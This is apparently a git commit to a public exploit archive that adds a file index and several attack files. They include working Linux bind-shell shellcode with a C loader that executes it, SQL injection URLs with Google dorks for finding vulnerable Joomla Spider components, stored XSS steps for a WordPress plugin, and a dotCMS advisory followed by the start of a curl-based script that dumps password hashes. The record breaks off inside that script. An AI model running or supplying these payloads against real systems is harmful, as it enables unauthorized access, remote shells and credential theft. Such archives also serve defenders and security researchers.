From 2f2ccec5c2d25d3cd0f4a4abf032fc2fa1204bc1 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 17 Feb 2017 05:01:19 +0000 Subject: [PATCH] DB: 2017-02-17 8 new exploits Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes) Joomla! Component 'com_spidercalendar' - SQL Injection Joomla! Component Spider Calendar - SQL Injection Joomla! Component 'com_spidercatalog' - 'Product_ID' Parameter SQL Injection Joomla! Component Spider Catalog 1.1 - 'Product_ID' Parameter SQL Injection Joomla! Component 'com_spidercalendar' - 'date' Parameter Blind SQL Injection Joomla! Component Spider Calendar - 'date' Parameter Blind SQL Injection Joomla! Component 'com_spidercalendar' 3.2.6 - SQL Injection Joomla! Component Spider Calendar 3.2.6 - SQL Injection Joomla! Component 'com_spidercontacts' 1.3.6 - 'contacts_id' Parameter SQL Injection Joomla! Component Spider Contacts 1.3.6 - 'contacts_id' Parameter SQL Injection Joomla! Component 'com_spiderfaq' - SQL Injection Joomla! Component Spider FAQ - SQL Injection Joomla! Component Spider Calendar Lite 3.2.16 - SQL Injection Joomla! Component Spider Catalog Lite 1.8.10 - SQL Injection Joomla! Component Spider Facebook 1.6.1 - SQL Injection Joomla! Component Spider FAQ Lite 1.3.1 - SQL Injection WordPress Plugin Corner Ad 1.0.7 - Cross-Site Scripting dotCMS 3.6.1 - Blind Boolean SQL Injection Joomla! Component JEmbedAll 1.4 - SQL Injection --- files.csv | 20 +- platforms/linux/shellcode/41375.c | 194 +++++++++++++++++ platforms/php/webapps/41371.txt | 19 ++ platforms/php/webapps/41372.txt | 19 ++ platforms/php/webapps/41373.txt | 17 ++ platforms/php/webapps/41374.txt | 17 ++ platforms/php/webapps/41376.txt | 44 ++++ platforms/php/webapps/41377.sh | 333 ++++++++++++++++++++++++++++++ platforms/php/webapps/41378.txt | 25 +++ 9 files changed, 682 insertions(+), 6 deletions(-) create mode 100755 platforms/linux/shellcode/41375.c create mode 100755 platforms/php/webapps/41371.txt create mode 100755 platforms/php/webapps/41372.txt create mode 100755 platforms/php/webapps/41373.txt create mode 100755 platforms/php/webapps/41374.txt create mode 100755 platforms/php/webapps/41376.txt create mode 100755 platforms/php/webapps/41377.sh create mode 100755 platforms/php/webapps/41378.txt diff --git a/files.csv b/files.csv index f8c24de5d..00b8574af 100644 --- a/files.csv +++ b/files.csv @@ -15896,6 +15896,7 @@ id,file,description,date,author,platform,type,port 41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0 41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0 41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0 +41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 @@ -25777,7 +25778,7 @@ id,file,description,date,author,platform,type,port 20956,platforms/php/webapps/20956.txt,"vBulletin Yet Another Awards System 4.0.2 - SQL Injection",2012-08-31,Backsl@sh/Dan,php,webapps,0 20959,platforms/windows/webapps/20959.py,"OTRS Open Technology Real Services 3.1.8 / 3.1.9 - Cross-Site Scripting",2012-08-31,"Mike Eduard",windows,webapps,0 20981,platforms/php/webapps/20981.txt,"SugarCRM Community Edition 6.5.2 (Build 8410) - Multiple Vulnerabilities",2012-09-01,"Brendan Coles",php,webapps,0 -20983,platforms/php/webapps/20983.pl,"Joomla! Component 'com_spidercalendar' - SQL Injection",2012-09-01,D4NB4R,php,webapps,0 +20983,platforms/php/webapps/20983.pl,"Joomla! Component Spider Calendar - SQL Injection",2012-09-01,D4NB4R,php,webapps,0 20987,platforms/asp/webapps/20987.txt,"Citrix Nfuse 1.51 - Webroot Disclosure",2001-07-02,sween,asp,webapps,0 20995,platforms/php/webapps/20995.txt,"Cobalt Qube Webmail 1.0 - Directory Traversal",2001-07-05,kf,php,webapps,0 20996,platforms/php/webapps/20996.txt,"Basilix Webmail 1.0 - File Disclosure",2001-07-06,"karol _",php,webapps,0 @@ -26201,7 +26202,7 @@ id,file,description,date,author,platform,type,port 22396,platforms/php/webapps/22396.txt,"WordPress Plugin bbPress - Multiple Vulnerabilities",2012-11-01,Dark-Puzzle,php,webapps,0 22398,platforms/php/webapps/22398.php,"Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution",2012-11-01,EgiX,php,webapps,0 22399,platforms/php/webapps/22399.txt,"Endpoint Protector 4.0.4.2 - Multiple Persistent Cross-Site Scripting",2012-11-01,"CYBSEC Labs",php,webapps,0 -22403,platforms/php/webapps/22403.txt,"Joomla! Component 'com_spidercatalog' - 'Product_ID' Parameter SQL Injection",2012-11-01,D4NB4R,php,webapps,0 +22403,platforms/php/webapps/22403.txt,"Joomla! Component Spider Catalog 1.1 - 'Product_ID' Parameter SQL Injection",2012-11-01,D4NB4R,php,webapps,0 22405,platforms/php/webapps/22405.txt,"MyBB Follower User Plugin - SQL Injection",2012-11-01,Zixem,php,webapps,0 22408,platforms/cgi/webapps/22408.txt,"Planetmoon - Guestbook Clear Text Password Retrieval",2003-03-21,subj,cgi,webapps,0 22411,platforms/php/webapps/22411.txt,"PHP-Nuke 5.6/6.x - banners.php Banner Manager Password Disclosure",2003-03-22,frog,php,webapps,0 @@ -26704,7 +26705,7 @@ id,file,description,date,author,platform,type,port 23774,platforms/php/webapps/23774.txt,"YaBB SE 1.5.x - Arbitrary File Deletion",2004-03-01,"Alnitak and BackSpace",php,webapps,0 23775,platforms/php/webapps/23775.txt,"YaBB SE 1.5.x - Multiple Parameter SQL Injection",2004-03-01,"Alnitak and BackSpace",php,webapps,0 23781,platforms/php/webapps/23781.txt,"MyBB 1.6.9 - 'editpost.php posthash' Time Based SQL Injection",2012-12-31,"Joshua Rogers",php,webapps,0 -23782,platforms/php/webapps/23782.txt,"Joomla! Component 'com_spidercalendar' - 'date' Parameter Blind SQL Injection",2012-12-31,Red-D3v1L,php,webapps,0 +23782,platforms/php/webapps/23782.txt,"Joomla! Component Spider Calendar - 'date' Parameter Blind SQL Injection",2012-12-31,Red-D3v1L,php,webapps,0 24047,platforms/php/webapps/24047.txt,"Protector System 1.15 b1 - 'index.php' SQL Injection",2004-04-23,waraxe,php,webapps,0 24048,platforms/php/webapps/24048.txt,"Protector System 1.15 - blocker_query.php Multiple Parameter Cross-Site Scripting",2004-04-23,waraxe,php,webapps,0 24046,platforms/php/webapps/24046.txt,"Fusionphp Fusion News 3.6.1 - Cross-Site Scripting",2004-04-23,DarkBicho,php,webapps,0 @@ -33630,7 +33631,7 @@ id,file,description,date,author,platform,type,port 34565,platforms/php/webapps/34565.txt,"NuSOAP 0.9.5 - 'nusoap.php' Cross-Site Scripting",2010-09-03,"Bogdan Calin",php,webapps,0 34578,platforms/php/webapps/34578.txt,"WordPress Theme Acento - 'view-pdf.php file Parameter' Arbitrary File Download",2014-09-08,alieye,php,webapps,80 34581,platforms/php/webapps/34581.txt,"Zen Cart 1.5.3 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 -34571,platforms/php/webapps/34571.py,"Joomla! Component 'com_spidercalendar' 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0 +34571,platforms/php/webapps/34571.py,"Joomla! Component Spider Calendar 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0 34572,platforms/php/webapps/34572.txt,"WordPress Plugin Bulk Delete Users by Email 1.0 - Cross-Site Request Forgery",2014-09-08,"Fikri Fadzil",php,webapps,0 34580,platforms/php/webapps/34580.txt,"phpMyFAQ 2.8.x - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 34579,platforms/php/webapps/34579.txt,"vBulletin 5.1.x - Persistent Cross-Site Scripting",2014-09-08,smash,php,webapps,80 @@ -33669,7 +33670,7 @@ id,file,description,date,author,platform,type,port 34620,platforms/php/webapps/34620.txt,"PaysiteReviewCMS - 'image.php' Cross-Site Scripting",2010-09-14,"Valentin Hoebel",php,webapps,0 34751,platforms/hardware/webapps/34751.pl,"ZYXEL Prestig P-660HNU-T1 - ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80 34624,platforms/php/webapps/34624.txt,"OroCRM - Persistent Cross-Site Scripting",2014-09-11,Provensec,php,webapps,80 -34625,platforms/php/webapps/34625.py,"Joomla! Component 'com_spidercontacts' 1.3.6 - 'contacts_id' Parameter SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 +34625,platforms/php/webapps/34625.py,"Joomla! Component Spider Contacts 1.3.6 - 'contacts_id' Parameter SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion",2014-09-11,Vulnerability-Lab,ios,webapps,9900 34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent Cross-Site Scripting",2014-09-11,Vulnerability-Lab,ios,webapps,0 34628,platforms/php/webapps/34628.txt,"Santafox 2.0.2 - 'search' Parameter Cross-Site Scripting",2010-09-06,"High-Tech Bridge SA",php,webapps,0 @@ -34827,7 +34828,7 @@ id,file,description,date,author,platform,type,port 36461,platforms/php/webapps/36461.txt,"Social Network Community 2 - 'userID' Parameter SQL Injection",2011-12-17,Lazmania61,php,webapps,0 36462,platforms/php/webapps/36462.txt,"Video Community Portal - 'userID' Parameter SQL Injection",2011-12-18,Lazmania61,php,webapps,0 36463,platforms/php/webapps/36463.txt,"Telescope 0.9.2 - Markdown Persistent Cross-Site Scripting",2015-03-21,shubs,php,webapps,0 -36464,platforms/php/webapps/36464.txt,"Joomla! Component 'com_spiderfaq' - SQL Injection",2015-03-22,"Manish Tanwar",php,webapps,0 +36464,platforms/php/webapps/36464.txt,"Joomla! Component Spider FAQ - SQL Injection",2015-03-22,"Manish Tanwar",php,webapps,0 36466,platforms/php/webapps/36466.txt,"WordPress Plugin Marketplace 2.4.0 - Arbitrary File Download",2015-03-22,"Kacper Szurek",php,webapps,0 36468,platforms/php/webapps/36468.txt,"PHP Booking Calendar 10e - 'page_info_message' Parameter Cross-Site Scripting",2011-12-19,G13,php,webapps,0 36469,platforms/php/webapps/36469.txt,"Joomla! Component 'com_tsonymf' - 'idofitem' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0 @@ -37288,3 +37289,10 @@ id,file,description,date,author,platform,type,port 41361,platforms/hardware/webapps/41361.txt,"Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 - Multiple Vulnerabilities",2016-11-28,SlidingWindow,hardware,webapps,0 41362,platforms/php/webapps/41362.txt,"Joomla! Component JoomBlog 1.3.1 - SQL Injection",2017-02-15,"Ihsan Sencan",php,webapps,0 41368,platforms/php/webapps/41368.txt,"Joomla! Component JSP Store Locator 2.2 - 'id' Parameter SQL Injection",2017-02-15,"Ihsan Sencan",php,webapps,0 +41371,platforms/php/webapps/41371.txt,"Joomla! Component Spider Calendar Lite 3.2.16 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0 +41372,platforms/php/webapps/41372.txt,"Joomla! Component Spider Catalog Lite 1.8.10 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0 +41373,platforms/php/webapps/41373.txt,"Joomla! Component Spider Facebook 1.6.1 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0 +41374,platforms/php/webapps/41374.txt,"Joomla! Component Spider FAQ Lite 1.3.1 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0 +41376,platforms/php/webapps/41376.txt,"WordPress Plugin Corner Ad 1.0.7 - Cross-Site Scripting",2017-02-16,"Atik Rahman",php,webapps,0 +41377,platforms/php/webapps/41377.sh,"dotCMS 3.6.1 - Blind Boolean SQL Injection",2017-02-16,"Ben Nott",php,webapps,80 +41378,platforms/php/webapps/41378.txt,"Joomla! Component JEmbedAll 1.4 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0 diff --git a/platforms/linux/shellcode/41375.c b/platforms/linux/shellcode/41375.c new file mode 100755 index 000000000..de68e60d7 --- /dev/null +++ b/platforms/linux/shellcode/41375.c @@ -0,0 +1,194 @@ +/** + Copyright © 2017 Odzhan. All Rights Reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions are + met: + + 1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + + 2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + 3. The name of the author may not be used to endorse or promote products + derived from this software without specific prior written permission. + + THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR + IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED + WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, + INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES + (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, + STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN + ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE + POSSIBILITY OF SUCH DAMAGE. */ + +#include +#include +#include +#include + +#include +#include +#include +#include + +// bind shell for 32 and 64-bit Linux +// +#define BS_SIZE 156 + +char BS[] = { + /* 0000 */ "\xb8\xfd\xff\xfb\x2d" /* mov eax, 0x2dfbfffd */ + /* 0005 */ "\xbb\xff\xff\xff\xff" /* mov ebx, 0xffffffff */ + /* 000A */ "\xf7\xd0" /* not eax */ + /* 000C */ "\xf7\xd3" /* not ebx */ + /* 000E */ "\x50" /* push rax */ + /* 000F */ "\x50" /* push rax */ + /* 0010 */ "\x54" /* push rsp */ + /* 0011 */ "\x5f" /* pop rdi */ + /* 0012 */ "\xab" /* stosd */ + /* 0013 */ "\x93" /* xchg ebx, eax */ + /* 0014 */ "\xab" /* stosd */ + /* 0015 */ "\x54" /* push rsp */ + /* 0016 */ "\x5d" /* pop rbp */ + /* 0017 */ "\x31\xc0" /* xor eax, eax */ + /* 0019 */ "\x99" /* cdq */ + /* 001A */ "\xb0\x67" /* mov al, 0x67 */ + /* 001C */ "\x6a\x01" /* push 0x1 */ + /* 001E */ "\x5e" /* pop rsi */ + /* 001F */ "\x6a\x02" /* push 0x2 */ + /* 0021 */ "\x5f" /* pop rdi */ + /* 0022 */ "\x48\x75\x24" /* jnz 0x49 */ + /* 0025 */ "\xb0\x29" /* mov al, 0x29 */ + /* 0027 */ "\x0f\x05" /* syscall */ + /* 0029 */ "\x97" /* xchg edi, eax */ + /* 002A */ "\x55" /* push rbp */ + /* 002B */ "\x5e" /* pop rsi */ + /* 002C */ "\xb2\x10" /* mov dl, 0x10 */ + /* 002E */ "\xb0\x31" /* mov al, 0x31 */ + /* 0030 */ "\x0f\x05" /* syscall */ + /* 0032 */ "\x50" /* push rax */ + /* 0033 */ "\x5e" /* pop rsi */ + /* 0034 */ "\xb0\x32" /* mov al, 0x32 */ + /* 0036 */ "\x0f\x05" /* syscall */ + /* 0038 */ "\xb0\x2b" /* mov al, 0x2b */ + /* 003A */ "\x0f\x05" /* syscall */ + /* 003C */ "\x97" /* xchg edi, eax */ + /* 003D */ "\x96" /* xchg esi, eax */ + /* 003E */ "\xb0\x21" /* mov al, 0x21 */ + /* 0040 */ "\x0f\x05" /* syscall */ + /* 0042 */ "\x83\xee\x01" /* sub esi, 0x1 */ + /* 0045 */ "\x79\xf7" /* jns 0x3e */ + /* 0047 */ "\xeb\x2f" /* jmp 0x78 */ + /* 0049 */ "\x56" /* push rsi */ + /* 004A */ "\x5b" /* pop rbx */ + /* 004B */ "\x52" /* push rdx */ + /* 004C */ "\x53" /* push rbx */ + /* 004D */ "\x57" /* push rdi */ + /* 004E */ "\x54" /* push rsp */ + /* 004F */ "\x59" /* pop rcx */ + /* 0050 */ "\xcd\x80" /* int 0x80 */ + /* 0052 */ "\x97" /* xchg edi, eax */ + /* 0053 */ "\x5b" /* pop rbx */ + /* 0054 */ "\x5e" /* pop rsi */ + /* 0055 */ "\x6a\x10" /* push 0x10 */ + /* 0057 */ "\x55" /* push rbp */ + /* 0058 */ "\x57" /* push rdi */ + /* 0059 */ "\xb0\x66" /* mov al, 0x66 */ + /* 005B */ "\x89\xe1" /* mov ecx, esp */ + /* 005D */ "\xcd\x80" /* int 0x80 */ + /* 005F */ "\x89\x51\x04" /* mov [rcx+0x4], edx */ + /* 0062 */ "\xb0\x66" /* mov al, 0x66 */ + /* 0064 */ "\xb3\x04" /* mov bl, 0x4 */ + /* 0066 */ "\xcd\x80" /* int 0x80 */ + /* 0068 */ "\xb0\x66" /* mov al, 0x66 */ + /* 006A */ "\x43\xcd\x80" /* int 0x80 */ + /* 006D */ "\x6a\x02" /* push 0x2 */ + /* 006F */ "\x59" /* pop rcx */ + /* 0070 */ "\x93" /* xchg ebx, eax */ + /* 0071 */ "\xb0\x3f" /* mov al, 0x3f */ + /* 0073 */ "\xcd\x80" /* int 0x80 */ + /* 0075 */ "\x49\x79\xf9" /* jns 0x71 */ + /* 0078 */ "\x99" /* cdq */ + /* 0079 */ "\x31\xf6" /* xor esi, esi */ + /* 007B */ "\x50" /* push rax */ + /* 007C */ "\x50" /* push rax */ + /* 007D */ "\x50" /* push rax */ + /* 007E */ "\x54" /* push rsp */ + /* 007F */ "\x5b" /* pop rbx */ + /* 0080 */ "\x53" /* push rbx */ + /* 0081 */ "\x5f" /* pop rdi */ + /* 0082 */ "\xc7\x07\x2f\x62\x69\x6e" /* mov dword [rdi], 0x6e69622f */ + /* 0088 */ "\xc7\x47\x04\x2f\x2f\x73\x68" /* mov dword [rdi+0x4], 0x68732f2f */ + /* 008F */ "\x40\x75\x04" /* jnz 0x96 */ + /* 0092 */ "\xb0\x3b" /* mov al, 0x3b */ + /* 0094 */ "\x0f\x05" /* syscall */ + /* 0096 */ "\x31\xc9" /* xor ecx, ecx */ + /* 0098 */ "\xb0\x0b" /* mov al, 0xb */ + /* 009A */ "\xcd\x80" /* int 0x80 */ +}; + +void bin2file(void *p, int len) +{ + FILE *out = fopen("rs.bin", "wb"); + if (out!= NULL) + { + fwrite(p, 1, len, out); + fclose(out); + } +} + +void xcode(char *s, int len, uint32_t ip, int16_t port) +{ + uint8_t *p; + + p=(uint8_t*)mmap (0, len, + PROT_EXEC | PROT_WRITE | PROT_READ, + MAP_ANON | MAP_PRIVATE, -1, 0); + + memcpy(p, s, len); + memcpy((void*)&p[3], &port, 2); // set the port + memcpy((void*)&p[6], &ip, 4); // set the ip + + //bin2file(p, len); + + // execute + ((void(*)())p)(); + + munmap ((void*)p, len); +} + +int main(int argc, char *argv[]) +{ + uint32_t ip = 0; + int16_t port = 0; + + if (argc < 2) { + printf ("\nbs_test \n"); + return 0; + } + port = atoi(argv[1]); + + if (port<0 || port>65535) { + printf ("\ninvalid port specified\n"); + return 0; + } + port = htons(port); + + // optional ip address? + if (argc > 2) { + ip = inet_addr(argv[2]); + } + // invert both to mask null bytes. + // obviously no rigorous checking here + ip = ~ip; + port = ~port; + + xcode (BS, BS_SIZE, ip, port); + return 0; +} + diff --git a/platforms/php/webapps/41371.txt b/platforms/php/webapps/41371.txt new file mode 100755 index 000000000..9f493fd9d --- /dev/null +++ b/platforms/php/webapps/41371.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Joomla! Component Spider Calendar Lite v3.2.16 - SQL Injection +# Google Dork: inurl:index.php?option=com_spidercalendar +# Date: 16.02.2017 +# Vendor Homepage: http://web-dorado.com/ +# Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/spider-calendar-lite/ +# Demo: http://demo.web-dorado.com/spider-calendar.html +# Version: 3.2.16 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=[SQL] +# http://localhost/[PATH]/index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=1&module_id=92&date92=2017-02-3&cat_ids=&Itemid=[SQL] +# Etc... +# # # # # diff --git a/platforms/php/webapps/41372.txt b/platforms/php/webapps/41372.txt new file mode 100755 index 000000000..095dfa968 --- /dev/null +++ b/platforms/php/webapps/41372.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Joomla! Component Spider Catalog Lite v1.8.10 - SQL Injection +# Google Dork: inurl:index.php?option=com_spidercatalog +# Date: 16.02.2017 +# Vendor Homepage: http://web-dorado.com/ +# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/spider-catalog-lite/ +# Demo: http://demo.web-dorado.com/spider-catalog.html +# Version: 1.8.10 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_spidercatalog&product_id=40&view=showproduct&page_num=1&back=1&show_category_details=0&display_type=list&show_subcategories=0&show_subcategories_products=0&show_products=1&select_categories=0&Itemid=[SQL] +# +http://localhost/[PATH]/index.php?option=com_spidercatalog&view=spidercatalog&select_categories=[SQL]&show_category_details=1&display_type=cell&show_subcategories=1 +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41373.txt b/platforms/php/webapps/41373.txt new file mode 100755 index 000000000..5cf9832de --- /dev/null +++ b/platforms/php/webapps/41373.txt @@ -0,0 +1,17 @@ +# # # # # +# Exploit Title: Joomla! Component Spider Facebook v1.6.1 - SQL Injection +# Google Dork: inurl:index.php?option=com_spiderfacebook +# Date: 16.02.2017 +# Vendor Homepage: http://web-dorado.com/ +# Software Buy: https://extensions.joomla.org/extensions/extension/social-web/social-display/spider-facebook/ +# Demo: http://demo.web-dorado.com/spider-facebook.html +# Version: 1.6.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_spiderfacebook&task=loginwith&name=[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41374.txt b/platforms/php/webapps/41374.txt new file mode 100755 index 000000000..9538a4ab8 --- /dev/null +++ b/platforms/php/webapps/41374.txt @@ -0,0 +1,17 @@ +# # # # # +# Exploit Title: Joomla! Component Spider FAQ Lite v1.3.1 - SQL Injection +# Google Dork: inurl:index.php?option=com_spiderfaq +# Date: 16.02.2017 +# Vendor Homepage: http://web-dorado.com/ +# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/faq/spider-faq-lite/ +# Demo: http://demo.web-dorado.com/spider-faq.html +# Version: 1.3.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=1&searchform=1&expand=0&Itemid=[SQL] +# # # # # diff --git a/platforms/php/webapps/41376.txt b/platforms/php/webapps/41376.txt new file mode 100755 index 000000000..a0fec5d2a --- /dev/null +++ b/platforms/php/webapps/41376.txt @@ -0,0 +1,44 @@ +# Exploit Title: Authorized Stored XSS at WordPress Corner-Ad plugin. +# Google Dork: inurl:/wp-content/plugins/corner-ad +# Date: 16-02-17 +# Exploit Author: Atik Rahman +# Vendor Homepage: https://wordpress.org/plugins/corner-ad/ +# Software Link: https://downloads.wordpress.org/plugin/corner-ad.zip +# Version: 1.0.7 +# Tested on: Firefox 44, Windows10 + + +Vendor Description +--------------------- + +*Corner Ad* is a plugin which display you ads in a corner of your +WordPress website page. + +The Plugin has 1,000+ active install. + + +Stored XSS in Ad Name +---------------------- + +Ad name input fields aren't properly escaped. This +could lead to an XSS attack that could possibly affect +administrators,users,editor. + + + + +1. Go to http://localhost/wp-admin/options-general.php?page=corner-ad.php + +2. Click on create new Add button. + +3. And Use Ad name as "/> *Fill +the other field. + +4.Now Click on save corner Add button when it's add a new add go to the +http://localhost/wp-admin/options-general.php?page=corner-ad.php +for corner add list. And now Your xss will + +be executed. + +5. If a normal editor,author visit the corner add list page xss will +effect them also. diff --git a/platforms/php/webapps/41377.sh b/platforms/php/webapps/41377.sh new file mode 100755 index 000000000..8d63c2d25 --- /dev/null +++ b/platforms/php/webapps/41377.sh @@ -0,0 +1,333 @@ +: ' +# Blind Boolean SQL Injection in dotCMS <= 3.6.1 (CVE-2017-5344) + +## Product Description + +dotCMS is a scalable, java based, open source content management system +(CMS) that has been designed to manage and deliver personalized, permission +based content experiences across multiple channels. dotCMS can serve as the +plaform for sites, mobile apps, mini-sites, portals, intranets or as a +headless CMS (content is consumed via RESTful APIs). dotCMS is used +everywhere, from running small sites to powering multi-node installations +for governemnts, Fortune 100 companies, Universities and Global Brands. A +dotCMS environment can scale to support hundreds of editors managing +thousands of sites with millions of content objects. + +## Vulnerability Type + +Blind Boolean SQL injection + +## Vulnerability Description + +dotCMS versions up to 3.6.1 (and possibly others) are vulnerable to blind +boolean SQL injection in the q and inode parameters at the +/categoriesServlet path. This servlet is a remotely accessible, +unauthenticated function of default dotCMS installations and can be +exploited to exfiltrate sensitive information from databases accessible to +the DMBS user configured with the product. + +Exploitation of the vulnerability is limited to the MySQL DMBS in 3.5 - +3.6.1 as SQL escaping controls were added to address a similar +vulnerability discovered in previous versions of the product. The means of +bypassing these features which realise this vulnerability have only been +successfully tested with MySQL 5.5, 5.6 and 5.7 and it is believed other +DMBSes are not affected. Versions prior to 3.6 do not have these controls +and can be exploited directly on a greater number of paired DMBSes. +PostgreSQL is vulnerable in all described versions of dotCMS when +PostgreSQL standard_confirming_strings setting is disabled (enabled by +default). + +The vulnerability is the result of string interpolation and directly SQL +statement execution without sanitising user input. The intermediate +resolution for a previous SQLi vulnerability was to whitelist and partially +filter user input before interpolation. This vulnerability overcomes this +filtering to perform blind boolean SQL injection. The resolution to this +vulnerability was to implement the use of prepared statements in the +affected locations. + +This vulnerability has been present in dotCMS since at least since version +3.0. + +## Exploit + +A proof of concept is available here: +https://github.com/xdrr/webapp-exploits/tree/master/vendors/dotcms/2017.01.blind-sqli + +## Versions + +dotCMS <= 3.3.2 and MYSQL, MSSQL, H2, PostgreSQL + +dotCMS 3.5 - 3.6.1 and (MYSQL or PostgreSQL w/ standard_confirming_strings +disabled) + +## Attack Type + +Unauthenticated, Remote + +## Impact + +The SQL injection vulnerability can be used to exfiltrate sensitive +information from the DBMS used with dotCMS. Depending of the DBMS +configuration and type, the issue could be as severe as establishing a +remote shell (such as by using xp_exec on MSSQL servers) or in the most +limited cases, restricted only to exfiltration of data in dotCMS database +tables. + +## Credit + +This vulnerability was discovered by Ben Nott . + +Credit goes to Erlar Lang for discovering similar SQL injection +vulnerabilities in nearby code and for inspiring this discovery. + +## Disclosure Timeline + + * Jan 2, 2017 - Issue discovered. + * Jan 2, 2017 - Vendor advised of discovery and contact requested for +full disclosure. + * Jan 4, 2017 - Provided full disclosure to vendor. + * Jan 5, 2017 - Vendor acknowledged disclosure and confirmed finding +validity. + * Jan 14, 2017 - Vendor advised patch developed and preparing for release. + * Jan 24, 2017 - Vendor advised patching in progress. + * Feb 15, 2017 - Vendor advises ready for public disclosure. + +## References + +Vendor advisory: http://dotcms.com/security/SI-39 +CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-5344 +' + +#!/bin/bash +# +# Dump password hashes from dotCMS <= 3.6.1 using blind boolean SQL injection. +# CVE: CVE-2017-5344 +# Author: Ben Nott +# Date: January 2017 +# +# Note this exploit is tuned for MySQL backends but can be adapted +# for other DMBS's. + +show_usage() { + echo "Usage $0 [target]" + echo + echo "Where:" + echo -e "target\t...\thttp://target.example.com (no trailing slash, port optional)" + echo + echo "For example:" + echo + echo "$0 http://www.examplesite.com" + echo "$0 https://www.mycmssite.com:9443" + echo + exit 1 +} + +test_exploit() { + target=$1 + res=$(curl -k -s -X 'GET' \ + -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0' -H 'Upgrade-Insecure-Requests: 1' \ + "${target}/categoriesServlet?q=%5c%5c%27") + + if [ $? -ne 0 ]; + then + echo "Failed to connect. Check host and try again!" + exit 1 + fi + + if [ -z "$res" ]; + then + echo "The target appears vulnerable. We're good to go!" + else + echo "The target isn't vulnerable." + exit 1 + fi +} + +dump_char() { + target=$1 + char=$2 + database=$3 + 